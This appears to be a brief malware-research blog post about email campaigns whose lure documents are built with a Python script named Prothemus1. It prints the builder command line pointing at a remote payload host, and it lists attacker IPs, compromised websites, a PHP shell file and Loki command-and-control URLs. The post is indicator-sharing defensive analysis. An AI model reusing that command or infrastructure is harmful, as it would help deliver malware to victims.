Prothemus1: Python script creates malicious document

Here is a quick after_dinner_blog_post about multiple offensive campaigns delivered via email with a malicious document in attach. All the malicious documents used in the attacks are built using a Python script named Prothemus1:

The script is really simple, it takes two parameters: the url of a remote file and the name of the document to be created. To see the script used in a real scenario take a look at DUBAI_EMQUIRY.doc (SHA256: d7b759f762b6f0761ecd0bf959babc712e069dbdb58585ed83bc5232f1b45d69). The file has been created using the Prothemus1 script in this way:prothemus1.py HTTP:\\72.167.46.60\ap\121.doc DUBAI_EMQUIRY.doc

72.167.46.60 is not the only server storing malicious documents/payloads, 81.171.7.182 is another one used by the same Threat Actor. Most of the visible folders inside the two servers contain the same two files:

121.doc is the unique name used for every downloaded document I have seen so far. The new file makes use of VBscript:

Two files are downloaded from a compromised website, the real exe payload and a decoy document.
Among all the compromised sites I have seen so far amarinradio.com, toboreklab.com and rawmediatek.com, the last one has an open folder.

A closer look at the linux.php file reveals an RC-Shell…

I haven’t checked every single payload I have and I can’t be sure about the threats behind this whole system but as far as I have seen I think it’s almost all related to Loki (I repeat, I could be wrong..). Here are few of the contacted hosts by the final exe payload:
– ruralbiznex.bid/heav/loki/fre.php
– ruraltrade.bid/mob/loki/fre.php

This blog post is far from being complete, I have no time to end it with all the necessary information. However, if you needs some more infos because you want to dig in I’ll be happy to share as much as I can.